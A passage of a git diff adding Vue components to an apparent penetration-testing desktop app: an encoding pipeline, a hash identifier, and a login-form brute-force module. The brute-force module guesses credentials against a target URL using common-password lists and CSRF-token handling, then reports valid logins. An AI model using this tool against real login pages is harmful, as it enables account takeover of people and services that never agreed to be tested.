+const MORSE_INV: Record<string, string> = Object.fromEntries(Object.entries(MORSE).map(([k, v]) => [v, k]));
+
+function b64e(s: string): string {
+  try { return btoa(unescape(encodeURIComponent(s))); } catch { throw new Error("invalid utf-8 input"); }
+}
+function b64d(s: string): string {
+  try { return decodeURIComponent(escape(atob(s.replace(/\s+/g, "")))); } catch { throw new Error("invalid base64"); }
+}
+function hexE(s: string): string {
+  return Array.from(new TextEncoder().encode(s)).map(b => b.toString(16).padStart(2, "0")).join("");
+}
+function hexD(s: string): string {
+  const h = s.replace(/\s|0x/g, "");
+  if (!/^[0-9a-fA-F]*$/.test(h) || h.length % 2 !== 0) throw new Error("invalid hex");
+  const arr = new Uint8Array(h.length / 2);
+  for (let i = 0; i < h.length; i += 2) arr[i / 2] = parseInt(h.substr(i, 2), 16);
+  return new TextDecoder().decode(arr);
+}
+function htmlE(s: string): string {
+  return s.replace(/[&<>"']/g, c => ({ "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" }[c]!));
+}
+function htmlD(s: string): string {
+  const ta = document.createElement("textarea");
+  ta.innerHTML = s;
+  return ta.value;
+}
+function uniE(s: string): string {
+  return Array.from(s).map(c => c.charCodeAt(0) < 128 ? c : "\\u" + c.charCodeAt(0).toString(16).padStart(4, "0")).join("");
+}
+function uniD(s: string): string {
+  return s.replace(/\\u([0-9a-fA-F]{4})/g, (_, h) => String.fromCharCode(parseInt(h, 16)));
+}
+function rot13(s: string): string {
+  return s.replace(/[a-zA-Z]/g, c => {
+    const base = c <= "Z" ? 65 : 97;
+    return String.fromCharCode((c.charCodeAt(0) - base + 13) % 26 + base);
+  });
+}
+function morseE(s: string): string {
+  return s.toUpperCase().split("").map(c => MORSE[c] ?? "").filter(Boolean).join(" ");
+}
+function morseD(s: string): string {
+  return s.split("/").map(word =>
+    word.trim().split(/\s+/).map(sym => MORSE_INV[sym] ?? "").join("")
+  ).join(" ");
+}
+function jwtD(s: string): string {
+  const parts = s.trim().split(".");
+  if (parts.length !== 3) throw new Error("not a JWT");
+  const pad = (p: string) => p + "=".repeat((4 - p.length % 4) % 4);
+  const dec = (p: string) => decodeURIComponent(escape(atob(pad(p).replace(/-/g, "+").replace(/_/g, "/"))));
+  try {
+    const header = JSON.parse(dec(parts[0]));
+    const payload = JSON.parse(dec(parts[1]));
+    return JSON.stringify({ header, payload, signature_b64url: parts[2] }, null, 2);
+  } catch (e: any) { throw new Error("jwt decode failed: " + e.message); }
+}
+
+function apply(op: Op, s: string): string {
+  switch (op) {
+    case "b64-enc": return b64e(s);
+    case "b64-dec": return b64d(s);
+    case "url-enc": return encodeURIComponent(s);
+    case "url-dec": return decodeURIComponent(s);
+    case "hex-enc": return hexE(s);
+    case "hex-dec": return hexD(s);
+    case "html-enc": return htmlE(s);
+    case "html-dec": return htmlD(s);
+    case "unicode-enc": return uniE(s);
+    case "unicode-dec": return uniD(s);
+    case "rot13": return rot13(s);
+    case "reverse": return Array.from(s).reverse().join("");
+    case "upper": return s.toUpperCase();
+    case "lower": return s.toLowerCase();
+    case "morse-enc": return morseE(s);
+    case "morse-dec": return morseD(s);
+    case "jwt-dec": return jwtD(s);
+  }
+}
+
+function add(op: Op, label: string) {
+  pipeline.value.push({ op, label });
+  recompute();
+}
+
+function remove(i: number) {
+  pipeline.value.splice(i, 1);
+  recompute();
+}
+
+function clear() { pipeline.value = []; output.value = ""; error.value = ""; }
+
+function recompute() {
+  error.value = "";
+  let cur = input.value;
+  try {
+    for (const s of pipeline.value) cur = apply(s.op, cur);
+    output.value = cur;
+  } catch (e: any) {
+    error.value = e.message ?? String(e);
+    output.value = "";
+  }
+}
+
+async function copy() {
+  try {
+    await navigator.clipboard.writeText(output.value);
+    toast.value = "copied";
+    setTimeout(() => { toast.value = ""; }, 1000);
+  } catch {}
+}
+
+function swap() {
+  input.value = output.value;
+  pipeline.value = [];
+  output.value = "";
+  error.value = "";
+}
+</script>
+
+<template>
+  <div class="module">
+    <div class="io-split">
+      <label class="ta">
+        <span class="lbl">input</span>
+        <textarea class="term-input" v-model="input" rows="4" spellcheck="false" @input="recompute" placeholder="paste text to transform..." />
+      </label>
+      <label class="ta">
+        <span class="lbl">output
+          <button class="btn-ghost tiny" @click="copy" :disabled="!output">copy</button>
+          <button class="btn-ghost tiny" @click="swap" :disabled="!output">swap ↑</button>
+        </span>
+        <textarea class="term-input valid-out" :value="error || output" rows="4" readonly spellcheck="false" :class="{ err: !!error }" />
+      </label>
+    </div>
+
+    <div class="pipe">
+      <div class="pipe-head">
+        <span>pipeline · {{ pipeline.length }} op(s)</span>
+        <button class="btn-ghost tiny" @click="clear">clear</button>
+      </div>
+      <div v-if="!pipeline.length" class="pipe-empty">pick an operation ↓</div>
+      <div v-else class="pipe-chain">
+        <div v-for="(s, i) in pipeline" :key="i" class="step">
+          <span class="step-n">{{ i + 1 }}</span>
+          <span class="step-l">{{ s.label }}</span>
+          <button class="btn-ghost tiny" @click="remove(i)">×</button>
+          <span v-if="i < pipeline.length - 1" class="step-arrow">→</span>
+        </div>
+      </div>
+    </div>
+
+    <div class="ops-grid">
+      <button v-for="o in OPS" :key="o.id" class="op-btn" :class="`grp-${o.group}`" @click="add(o.id, o.label)">
+        {{ o.label }}
+      </button>
+    </div>
+
+    <div v-if="toast" class="toast">{{ toast }}</div>
+  </div>
+</template>
+
+<style scoped>
+.io-split { display: grid; grid-template-columns: 1fr 1fr; gap: 6px; }
+.lbl { display: flex; gap: 6px; align-items: center; }
+.btn-ghost.tiny { padding: 1px 6px; font-size: 9px; }
+.valid-out { color: var(--valid); }
+.valid-out.err { color: var(--alert); }
+
+.pipe { background: var(--bg-panel); border: 1px solid var(--border); padding: 6px 8px; }
+.pipe-head { display: flex; justify-content: space-between; font-size: 10px; color: var(--fg-dim); text-transform: uppercase; letter-spacing: 0.1em; margin-bottom: 4px; }
+.pipe-empty { color: var(--fg-ghost); font-size: 10px; text-align: center; padding: 6px; font-style: italic; }
+.pipe-chain { display: flex; gap: 4px; align-items: center; flex-wrap: wrap; }
+.step { display: flex; gap: 4px; align-items: center; padding: 3px 8px; background: var(--bg); border: 1px solid var(--info); color: var(--info); font-size: 11px; }
+.step-n { color: var(--fg-ghost); font-size: 9px; }
+.step-arrow { color: var(--fg-ghost); font-size: 14px; }
+
+.ops-grid { display: grid; grid-template-columns: repeat(auto-fill, minmax(130px, 1fr)); gap: 3px; }
+.op-btn {
+  padding: 5px 8px;
+  background: var(--bg-panel);
+  border: 1px solid var(--border);
+  color: var(--fg-dim);
+  font-size: 11px;
+  text-align: left;
+  cursor: pointer;
+  transition: all 0.1s;
+}
+.op-btn:hover { border-color: var(--alert); color: var(--alert); }
+.grp-base64 { border-left: 2px solid #3572a5; }
+.grp-url { border-left: 2px solid #d4a537; }
+.grp-hex { border-left: 2px solid #5cd982; }
+.grp-html { border-left: 2px solid #e76f00; }
+.grp-unicode { border-left: 2px solid #7fb3d5; }
+.grp-classic { border-left: 2px solid #ff2f4a; }
+.grp-jwt { border-left: 2px solid #ffb000; }
+
+.toast { position: absolute; bottom: 20px; left: 50%; transform: translateX(-50%); padding: 4px 12px; background: var(--valid); color: #000; font-size: 11px; letter-spacing: 0.1em; text-transform: uppercase; animation: toast 1s ease-out; pointer-events: none; z-index: 10; }
+@keyframes toast {
+  0% { opacity: 0; transform: translate(-50%, 10px); }
+  20%,80% { opacity: 1; transform: translate(-50%, 0); }
+  100% { opacity: 0; transform: translate(-50%, -10px); }
+}
+
+@media (max-width: 640px) {
+  .io-split { grid-template-columns: 1fr; }
+}
+</style>
diff --git a/src/components/modules/FormBrute.vue b/src/components/modules/FormBrute.vue
new file mode 100644
index 0000000..35e5d33
--- /dev/null
+++ b/src/components/modules/FormBrute.vue
@@ -0,0 +1,253 @@
+<script setup lang="ts">
+import { onMounted, onUnmounted, ref } from "vue";
+import { invoke } from "@tauri-apps/api/core";
+import { listen, type UnlistenFn } from "@tauri-apps/api/event";
+import Terminal from "../Terminal.vue";
+import Prompt from "../Prompt.vue";
+import { useTerminal } from "../../composables/useTerminal";
+
+interface Hit {
+  user: string;
+  pass: string;
+  status: number;
+  size: number;
+  redirect?: string;
+  reason: string;
+  time_ms: number;
+}
+
+const url = ref("https://target.com/login.php");
+const method = ref("POST");
+const bodyTemplate = ref("username={USER}&password={PASS}");
+const headersRaw = ref("");
+const users = ref("admin\nroot\nuser\ntest");
+const passwords = ref("");
+const mode = ref("clusterbomb");
+const primeUrl = ref("");
+const csrfRegex = ref("");
+const successRegex = ref("");
+const failRegex = ref("(?i)(invalid|wrong|incorrect|failed|error)");
+const successStatusStr = ref("302");
+const sizeDelta = ref<number | null>(null);
+const concurrency = ref(5);
+const timeoutMs = ref(10000);
+const followRedirects = ref(false);
+const stopOnFirst = ref(true);
+const running = ref(false);
+const progress = ref({ done: 0, total: 0 });
+const hits = ref<Hit[]>([]);
+const log = useTerminal();
+const unlistens: UnlistenFn[] = [];
+
+async function loadCommonPass() {
+  try {
+    const list: string[] = await invoke("form_brute_common_passwords");
+    passwords.value = list.join("\n");
+  } catch {}
+}
+
+function parseHeaders(): Record<string, string> {
+  const out: Record<string, string> = {};
+  for (const line of headersRaw.value.split("\n")) {
+    const i = line.indexOf(":");
+    if (i === -1) continue;
+    const k = line.slice(0, i).trim();
+    const v = line.slice(i + 1).trim();
+    if (k) out[k] = v;
+  }
+  return out;
+}
+
+async function run() {
+  if (running.value) return;
+  running.value = true;
+  hits.value = [];
+  progress.value = { done: 0, total: 0 };
+  log.clear();
+
+  const us = users.value.split(/[\s\n,]+/).map(s => s.trim()).filter(Boolean);
+  const ps = passwords.value.split(/\n/).map(s => s.trim()).filter(Boolean);
+  const statuses = successStatusStr.value.split(/[,\s]+/).map(s => parseInt(s, 10)).filter(n => !isNaN(n));
+
+  const total = mode.value === "pitchfork" ? Math.min(us.length, ps.length) : us.length * ps.length;
+  log.info(`target: ${method.value} ${url.value}`);
+  log.info(`${us.length} users × ${ps.length} passwords = ${total} attempts (${mode.value})`);
+
+  unlistens.push(await listen<string>("brute:status", (e) => log.dim(String(e.payload))));
+  unlistens.push(await listen<{ done: number; total: number }>("brute:progress", (e) => { progress.value = e.payload; }));
+  unlistens.push(await listen<Hit>("brute:hit", (e) => {
+    const h = e.payload;
+    hits.value.push(h);
+    log.hit(`[VALID] ${h.user}:${h.pass}  status=${h.status} size=${h.size}b  reason: ${h.reason}`);
+  }));
+
+  try {
+    await invoke("form_brute_run", {
+      req: {
+        url: url.value,
+        method: method.value,
+        body_template: bodyTemplate.value,
+        headers: parseHeaders(),
+        users: us,
+        passwords: ps,
+        mode: mode.value,
+        prime_url: primeUrl.value || null,
+        csrf_regex: csrfRegex.value || null,
+        csrf_field: "{CSRF}",
+        success_regex: successRegex.value || null,
+        fail_regex: failRegex.value || null,
+        success_status: statuses.length ? statuses : null,
+        size_delta_threshold: sizeDelta.value,
+        concurrency: concurrency.value,
+        timeout_ms: timeoutMs.value,
+        follow_redirects: followRedirects.value,
+        stop_on_first: stopOnFirst.value,
+      },
+    });
+    log.ok(`brute done: ${hits.value.length} valid cred(s)`);
+  } catch (e: any) {
+    log.err(String(e));
+  } finally {
+    running.value = false;
+    cleanup();
+  }
+}
+
+function cleanup() { while (unlistens.length) { const u = unlistens.pop(); if (u) u(); } }
+
+onMounted(loadCommonPass);
+onUnmounted(cleanup);
+</script>
+
+<template>
+  <div class="module">
+    <div class="form">
+      <div class="row">
+        <select v-model="method" class="method-sel">
+          <option>POST</option>
+          <option>GET</option>
+          <option>PUT</option>
+        </select>
+        <input v-model="url" class="url-input" placeholder="https://target.com/login" spellcheck="false" />
+      </div>
+
+      <label class="ta">
+        <span class="lbl">body template — use <code>{{ "{USER}" }}</code> <code>{{ "{PASS}" }}</code> <code>{{ "{CSRF}" }}</code></span>
+        <textarea class="term-input" v-model="bodyTemplate" rows="2" spellcheck="false" placeholder="username={USER}&password={PASS}&_token={CSRF}" />
+      </label>
+
+      <details class="adv">
+        <summary>wordlists · {{ users.split(/\s+/).filter(Boolean).length }} users × {{ passwords.split(/\n/).filter(Boolean).length }} passwords</summary>
+        <div class="two-col">
+          <label class="ta">
+            <span class="lbl">users</span>
+            <textarea class="term-input" v-model="users" rows="5" spellcheck="false" />
+          </label>
+          <label class="ta">
+            <span class="lbl">passwords</span>
+            <textarea class="term-input" v-model="passwords" rows="5" spellcheck="false" />
+          </label>
+        </div>
+        <div class="row">
+          <label class="toggle"><input type="radio" value="clusterbomb" v-model="mode" /><span>clusterbomb (all × all)</span></label>
+          <label class="toggle"><input type="radio" value="pitchfork" v-model="mode" /><span>pitchfork (parallel)</span></label>
+        </div>
+      </details>
+
+      <details class="adv">
+        <summary>detection rules</summary>
+        <label class="ta"><span class="lbl">success regex (match = valid)</span>
+          <input class="inp" v-model="successRegex" placeholder='(?i)(welcome|dashboard|logout|my-account)' /></label>
+        <label class="ta"><span class="lbl">fail regex (no match = valid) <span class="hint">used if success regex empty/no-match</span></span>
+          <input class="inp" v-model="failRegex" placeholder='(?i)(invalid|wrong|incorrect)' /></label>
+        <div class="row">
+          <label class="mini wide"><span>success-status</span><input v-model="successStatusStr" placeholder="302" /></label>
+          <label class="mini"><span>size-delta</span><input v-model.number="sizeDelta" type="number" placeholder="off" /></label>
+        </div>
+      </details>
+
+      <details class="adv">
+        <summary>csrf + headers</summary>
+        <Prompt label="prime url" v-model="primeUrl" placeholder="https://target.com/login (GET first)" />
+        <label class="ta"><span class="lbl">csrf regex — capture group 1</span>
+          <input class="inp" v-model="csrfRegex" placeholder='name="_token"\s+value="([^"]+)"' /></label>
+        <label class="ta"><span class="lbl">extra headers (Key: Value per line)</span>
+          <textarea class="term-input" v-model="headersRaw" rows="3" spellcheck="false" placeholder="Referer: https://target.com/login&#10;X-Requested-With: XMLHttpRequest" /></label>
+      </details>
+
+      <div class="row">
+        <label class="toggle"><input type="checkbox" v-model="stopOnFirst" /><span>stop on first</span></label>
+        <label class="toggle"><input type="checkbox" v-model="followRedirects" /><span>follow</span></label>
+        <label class="mini"><span>conc</span><input v-model.number="concurrency" type="number" min="1" max="50" /></label>
+        <label class="mini"><span>t/out</span><input v-model.number="timeoutMs" type="number" min="1000" max="60000" /></label>
+      </div>
+      <div class="row">
+        <button class="exec" :disabled="running" @click="run">{{ running ? "[ bruting... ]" : "> brute" }}</button>
+      </div>
+
+      <div v-if="progress.total" class="bar">
+        <div class="bar-fill" :style="{ width: (progress.done / progress.total) * 100 + '%' }" />
+        <span class="bar-text">{{ progress.done }} / {{ progress.total }}</span>
+      </div>
+    </div>
+
+    <Terminal :lines="log.lines.value" title="form-brute // credential attack" @clear="log.clear()" />
+  </div>
+</template>
+
+<style scoped>
+.adv { border: 1px solid var(--border); background: var(--bg-panel); padding: 4px 8px; }
+.adv summary { cursor: pointer; font-size: 10px; color: var(--fg-dim); text-transform: uppercase; letter-spacing: 0.1em; padding: 2px 0; }
+.adv summary:hover { color: var(--fg); }
+.adv > *:not(summary) { margin-top: 6px; }
+
+.method-sel {
+  background: var(--bg-panel);
+  border: 1px solid var(--alert);
+  color: var(--alert);
+  padding: 4px 8px;
+  font-weight: 700;
+  font-size: 12px;
+  font-family: inherit;
+}
+.method-sel option { background: var(--bg); color: var(--fg); }
+
+.url-input {
+  flex: 1;
+  background: var(--bg-panel);
+  border: 1px solid var(--border);
+  color: var(--fg);
+  padding: 4px 8px;
+  font-size: 12px;
+}
+.url-input:focus { border-color: var(--accent); outline: none; }
+
+.inp {
+  background: var(--bg-panel);
+  border: 1px solid var(--border);
+  color: var(--fg);
+  padding: 4px 8px;
+  font-size: 12px;
+  font-family: inherit;
+  width: 100%;
+}
+.inp:focus { border-color: var(--info); outline: none; }
+
+.two-col {
+  display: grid;
+  grid-template-columns: 1fr 1fr;
+  gap: 6px;
+}
+code {
+  color: var(--info);
+  background: var(--bg);
+  padding: 0 4px;
+  border: 1px solid var(--border);
+  font-size: 10px;
+}
+.hint { color: var(--fg-ghost); font-size: 9px; text-transform: none; font-style: italic; }
+
+@media (max-width: 640px) {
+  .two-col { grid-template-columns: 1fr; }
+}
+</style>
diff --git a/src/components/modules/HashTools.vue b/src/components/modules/HashTools.vue
new file mode 100644
index 0000000..c35fd7b
--- /dev/null
+++ b/src/components/modules/HashTools.vue
@@ -0,0 +1,281 @@
+<script setup lang="ts">
+import { computed, ref } from "vue";
+
+const input = ref("");
+const calcText = ref("");
+
+interface Signature { name: string; pattern: RegExp; example?: string; }
+
+const SIGNATURES: Signature[] = [
+  { name: "MD5",                 pattern: /^[a-f0-9]{32}$/i, example: "5f4dcc3b5aa765d61d8327deb882cf99" },
+  { name: "NTLM",                pattern: /^[A-F0-9]{32}$/, example: "b4b9b02e6f09a9bd760f388b67351e2b" },
+  { name: "SHA-1",               pattern: /^[a-f0-9]{40}$/i, example: "356a192b7913b04c54574d18c28d46e6395428ab" },
+  { name: "MySQL 4.1+ (SHA1x2)", pattern: /^\*[A-F0-9]{40}$/, example: "*6691484EA6B50DDDE1926A220DA01FA9E575C18A" },
+  { name: "RIPEMD-160",          pattern: /^[a-f0-9]{40}$/i },
+  { name: "SHA-224",             pattern: /^[a-f0-9]{56}$/i },
+  { name: "SHA-256",             pattern: /^[a-f0-9]{64}$/i, example: "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855" },
+  { name: "SHA-384",             pattern: /^[a-f0-9]{96}$/i },
+  { name: "SHA-512",             pattern: /^[a-f0-9]{128}$/i },
+  { name: "bcrypt",              pattern: /^\$2[abxy]\$\d{2}\$[./A-Za-z0-9]{53}$/, example: "$2a$12$R9h/cIPz0gi.URNNX3kh2OPST9/PgBkqquzi.Ss7KIUgO2t0jWMUW" },
+  { name: "scrypt",              pattern: /^\$scrypt\$/ },
+  { name: "argon2id",            pattern: /^\$argon2id?\$/, example: "$argon2id$v=19$m=65536,t=3,p=4$..." },
+  { name: "PBKDF2-SHA1",         pattern: /^pbkdf2-sha1\$/ },
+  { name: "MD5 Crypt (old unix)",pattern: /^\$1\$/, example: "$1$salt$..." },
+  { name: "SHA-256 Crypt",       pattern: /^\$5\$/, example: "$5$salt$..." },
+  { name: "SHA-512 Crypt",       pattern: /^\$6\$/, example: "$6$salt$..." },
+  { name: "WordPress (PHPass)",  pattern: /^\$P\$[./A-Za-z0-9]{31}$/, example: "$P$BPMg6qGb..." },
+  { name: "PhpBB3 (PHPass)",     pattern: /^\$H\$[./A-Za-z0-9]{31}$/ },
+  { name: "Django PBKDF2",       pattern: /^pbkdf2_sha256\$/ },
+  { name: "Django SHA1",         pattern: /^sha1\$[^$]+\$[a-f0-9]{40}$/i },
+  { name: "LM Hash",             pattern: /^[A-F0-9]{32}$/, example: "aad3b435b51404eeaad3b435b51404ee" },
+  { name: "NetNTLMv2",           pattern: /^[^:]+::[^:]*:[A-F0-9]{16}:[A-F0-9]{32}:.+$/ },
+  { name: "Cisco Type 7",        pattern: /^[0-9]{2}[A-F0-9]+$/i },
+  { name: "Cisco IOS $9$",       pattern: /^\$9\$/ },
+  { name: "CRC32",               pattern: /^[a-f0-9]{8}$/i },
+  { name: "MySQL 3.23 (old)",    pattern: /^[a-f0-9]{16}$/i },
+  { name: "JWT",                 pattern: /^eyJ[A-Za-z0-9_-]+\.eyJ[A-Za-z0-9_-]+\.[A-Za-z0-9_-]*$/ },
+];
+
+const identified = computed(() => {
+  const s = input.value.trim();
+  if (!s) return [] as Signature[];
+  return SIGNATURES.filter(sig => sig.pattern.test(s));
+});
+
+const hashes = ref<Record<string, string>>({});
+
+async function compute() {
+  const text = calcText.value;
+  if (!text) { hashes.value = {}; return; }
+  const buf = new TextEncoder().encode(text);
+  const algos: [string, AlgorithmIdentifier][] = [
+    ["SHA-1", "SHA-1"],
+    ["SHA-256", "SHA-256"],
+    ["SHA-384", "SHA-384"],
+    ["SHA-512", "SHA-512"],
+  ];
+  const out: Record<string, string> = {};
+  out.MD5 = md5(text);
+  out.CRC32 = crc32(text).toString(16).padStart(8, "0");
+  for (const [name, algo] of algos) {
+    const digest = await crypto.subtle.digest(algo, buf);
+    out[name] = Array.from(new Uint8Array(digest)).map(b => b.toString(16).padStart(2, "0")).join("");
+  }
+  hashes.value = out;
+}
+
+// ---------- MD5 (pure JS) ----------
+function md5(str: string): string {
+  function rotateLeft(lValue: number, iShiftBits: number) { return (lValue << iShiftBits) | (lValue >>> (32 - iShiftBits)); }
+  function addUnsigned(lX: number, lY: number) {
+    const lX8 = (lX & 0x80000000), lY8 = (lY & 0x80000000);
+    const lX4 = (lX & 0x40000000), lY4 = (lY & 0x40000000);
+    const lResult = (lX & 0x3FFFFFFF) + (lY & 0x3FFFFFFF);
+    if (lX4 & lY4) return (lResult ^ 0x80000000 ^ lX8 ^ lY8);
+    if (lX4 | lY4) {
+      if (lResult & 0x40000000) return (lResult ^ 0xC0000000 ^ lX8 ^ lY8);
+      return (lResult ^ 0x40000000 ^ lX8 ^ lY8);
+    }
+    return (lResult ^ lX8 ^ lY8);
+  }
+  function F(x: number, y: number, z: number) { return (x & y) | ((~x) & z); }
+  function G(x: number, y: number, z: number) { return (x & z) | (y & (~z)); }
+  function H(x: number, y: number, z: number) { return x ^ y ^ z; }
+  function I(x: number, y: number, z: number) { return y ^ (x | (~z)); }
+  function FF(a: number, b: number, c: number, d: number, x: number, s: number, ac: number) {
+    a = addUnsigned(a, addUnsigned(addUnsigned(F(b, c, d), x), ac));
+    return addUnsigned(rotateLeft(a, s), b);
+  }
+  function GG(a: number, b: number, c: number, d: number, x: number, s: number, ac: number) {
+    a = addUnsigned(a, addUnsigned(addUnsigned(G(b, c, d), x), ac));
+    return addUnsigned(rotateLeft(a, s), b);
+  }
+  function HH(a: number, b: number, c: number, d: number, x: number, s: number, ac: number) {
+    a = addUnsigned(a, addUnsigned(addUnsigned(H(b, c, d), x), ac));
+    return addUnsigned(rotateLeft(a, s), b);
+  }
+  function II(a: number, b: number, c: number, d: number, x: number, s: number, ac: number) {
+    a = addUnsigned(a, addUnsigned(addUnsigned(I(b, c, d), x), ac));
+    return addUnsigned(rotateLeft(a, s), b);
+  }
+  function convertToWordArray(s: string) {
+    let lWordCount;
+    const lMessageLength = s.length;
+    const lNumberOfWords_temp1 = lMessageLength + 8;
+    const lNumberOfWords_temp2 = (lNumberOfWords_temp1 - (lNumberOfWords_temp1 % 64)) / 64;
+    const lNumberOfWords = (lNumberOfWords_temp2 + 1) * 16;
+    const lWordArray = new Array(lNumberOfWords - 1);
+    let lBytePosition = 0, lByteCount = 0;
+    while (lByteCount < lMessageLength) {
+      lWordCount = (lByteCount - (lByteCount % 4)) / 4;
+      lBytePosition = (lByteCount % 4) * 8;
+      lWordArray[lWordCount] = (lWordArray[lWordCount] | (s.charCodeAt(lByteCount) << lBytePosition));
+      lByteCount++;
+    }
+    lWordCount = (lByteCount - (lByteCount % 4)) / 4;
+    lBytePosition = (lByteCount % 4) * 8;
+    lWordArray[lWordCount] = lWordArray[lWordCount] | (0x80 << lBytePosition);
+    lWordArray[lNumberOfWords - 2] = lMessageLength << 3;
+    lWordArray[lNumberOfWords - 1] = lMessageLength >>> 29;
+    return lWordArray;
+  }
+  function wordToHex(lValue: number) {
+    let wordToHexValue = "", wordToHexValue_temp = "", lByte;
+    for (let lCount = 0; lCount <= 3; lCount++) {
+      lByte = (lValue >>> (lCount * 8)) & 255;
+      wordToHexValue_temp = "0" + lByte.toString(16);
+      wordToHexValue = wordToHexValue + wordToHexValue_temp.substr(wordToHexValue_temp.length - 2, 2);
+    }
+    return wordToHexValue;
+  }
+  function utf8Encode(s: string) { return unescape(encodeURIComponent(s)); }
+
+  const x = convertToWordArray(utf8Encode(str));
+  let a = 0x67452301, b = 0xEFCDAB89, c = 0x98BADCFE, d = 0x10325476;
+  const S11 = 7, S12 = 12, S13 = 17, S14 = 22;
+  const S21 = 5, S22 = 9, S23 = 14, S24 = 20;
+  const S31 = 4, S32 = 11, S33 = 16, S34 = 23;
+  const S41 = 6, S42 = 10, S43 = 15, S44 = 21;
+  for (let k = 0; k < x.length; k += 16) {
+    const AA = a, BB = b, CC = c, DD = d;
+    a = FF(a, b, c, d, x[k + 0], S11, 0xD76AA478);
+    d = FF(d, a, b, c, x[k + 1], S12, 0xE8C7B756);
+    c = FF(c, d, a, b, x[k + 2], S13, 0x242070DB);
+    b = FF(b, c, d, a, x[k + 3], S14, 0xC1BDCEEE);
+    a = FF(a, b, c, d, x[k + 4], S11, 0xF57C0FAF);
+    d = FF(d, a, b, c, x[k + 5], S12, 0x4787C62A);
+    c = FF(c, d, a, b, x[k + 6], S13, 0xA8304613);
+    b = FF(b, c, d, a, x[k + 7], S14, 0xFD469501);
+    a = FF(a, b, c, d, x[k + 8], S11, 0x698098D8);
+    d = FF(d, a, b, c, x[k + 9], S12, 0x8B44F7AF);
+    c = FF(c, d, a, b, x[k + 10], S13, 0xFFFF5BB1);
+    b = FF(b, c, d, a, x[k + 11], S14, 0x895CD7BE);
+    a = FF(a, b, c, d, x[k + 12], S11, 0x6B901122);
+    d = FF(d, a, b, c, x[k + 13], S12, 0xFD987193);
+    c = FF(c, d, a, b, x[k + 14], S13, 0xA679438E);
+    b = FF(b, c, d, a, x[k + 15], S14, 0x49B40821);
+    a = GG(a, b, c, d, x[k + 1], S21, 0xF61E2562);
+    d = GG(d, a, b, c, x[k + 6], S22, 0xC040B340);
+    c = GG(c, d, a, b, x[k + 11], S23, 0x265E5A51);
+    b = GG(b, c, d, a, x[k + 0], S24, 0xE9B6C7AA);
+    a = GG(a, b, c, d, x[k + 5], S21, 0xD62F105D);
+    d = GG(d, a, b, c, x[k + 10], S22, 0x2441453);
+    c = GG(c, d, a, b, x[k + 15], S23, 0xD8A1E681);
+    b = GG(b, c, d, a, x[k + 4], S24, 0xE7D3FBC8);
+    a = GG(a, b, c, d, x[k + 9], S21, 0x21E1CDE6);
+    d = GG(d, a, b, c, x[k + 14], S22, 0xC33707D6);
+    c = GG(c, d, a, b, x[k + 3], S23, 0xF4D50D87);
+    b = GG(b, c, d, a, x[k + 8], S24, 0x455A14ED);
+    a = GG(a, b, c, d, x[k + 13], S21, 0xA9E3E905);
+    d = GG(d, a, b, c, x[k + 2], S22, 0xFCEFA3F8);
+    c = GG(c, d, a, b, x[k + 7], S23, 0x676F02D9);
+    b = GG(b, c, d, a, x[k + 12], S24, 0x8D2A4C8A);
+    a = HH(a, b, c, d, x[k + 5], S31, 0xFFFA3942);
+    d = HH(d, a, b, c, x[k + 8], S32, 0x8771F681);
+    c = HH(c, d, a, b, x[k + 11], S33, 0x6D9D6122);
+    b = HH(b, c, d, a, x[k + 14], S34, 0xFDE5380C);
+    a = HH(a, b, c, d, x[k + 1], S31, 0xA4BEEA44);
+    d = HH(d, a, b, c, x[k + 4], S32, 0x4BDECFA9);
+    c = HH(c, d, a, b, x[k + 7], S33, 0xF6BB4B60);
+    b = HH(b, c, d, a, x[k + 10], S34, 0xBEBFBC70);
+    a = HH(a, b, c, d, x[k + 13], S31, 0x289B7EC6);
+    d = HH(d, a, b, c, x[k + 0], S32, 0xEAA127FA);
+    c = HH(c, d, a, b, x[k + 3], S33, 0xD4EF3085);
+    b = HH(b, c, d, a, x[k + 6], S34, 0x4881D05);
+    a = HH(a, b, c, d, x[k + 9], S31, 0xD9D4D039);
+    d = HH(d, a, b, c, x[k + 12], S32, 0xE6DB99E5);
+    c = HH(c, d, a, b, x[k + 15], S33, 0x1FA27CF8);
+    b = HH(b, c, d, a, x[k + 2], S34, 0xC4AC5665);
+    a = II(a, b, c, d, x[k + 0], S41, 0xF4292244);
+    d = II(d, a, b, c, x[k + 7], S42, 0x432AFF97);
+    c = II(c, d, a, b, x[k + 14], S43, 0xAB9423A7);
+    b = II(b, c, d, a, x[k + 5], S44, 0xFC93A039);
+    a = II(a, b, c, d, x[k + 12], S41, 0x655B59C3);
+    d = II(d, a, b, c, x[k + 3], S42, 0x8F0CCC92);
+    c = II(c, d, a, b, x[k + 10], S43, 0xFFEFF47D);
+    b = II(b, c, d, a, x[k + 1], S44, 0x85845DD1);
+    a = II(a, b, c, d, x[k + 8], S41, 0x6FA87E4F);
+    d = II(d, a, b, c, x[k + 15], S42, 0xFE2CE6E0);
+    c = II(c, d, a, b, x[k + 6], S43, 0xA3014314);
+    b = II(b, c, d, a, x[k + 13], S44, 0x4E0811A1);
+    a = II(a, b, c, d, x[k + 4], S41, 0xF7537E82);
+    d = II(d, a, b, c, x[k + 11], S42, 0xBD3AF235);
+    c = II(c, d, a, b, x[k + 2], S43, 0x2AD7D2BB);
+    b = II(b, c, d, a, x[k + 9], S44, 0xEB86D391);
+    a = addUnsigned(a, AA);
+    b = addUnsigned(b, BB);
+    c = addUnsigned(c, CC);
+    d = addUnsigned(d, DD);
+  }
+  return (wordToHex(a) + wordToHex(b) + wordToHex(c) + wordToHex(d)).toLowerCase();
+}
+
+function crc32(str: string): number {
+  let c;
+  const table = [] as number[];
+  for (let n = 0; n < 256; n++) {
+    c = n;
+    for (let k = 0; k < 8; k++) c = c & 1 ? 0xEDB88320 ^ (c >>> 1) : c >>> 1;
+    table[n] = c;
+  }
+  let crc = 0 ^ (-1);
+  for (let i = 0; i < str.length; i++) crc = (crc >>> 8) ^ table[(crc ^ str.charCodeAt(i)) & 0xFF];
+  return (crc ^ (-1)) >>> 0;
+}
+
+async function copy(t: string) {
+  try { await navigator.clipboard.writeText(t); } catch {}
+}
+</script>
+
+<template>
+  <div class="module">
+    <section class="pane">
+      <div class="pane-head">HASH IDENTIFIER</div>
+      <label class="ta">
+        <span class="lbl">hash to identify</span>
+        <textarea class="term-input" v-model="input" rows="2" spellcheck="false" placeholder="paste hash or JWT..." />
+      </label>
+      <div v-if="input.trim()" class="matches">
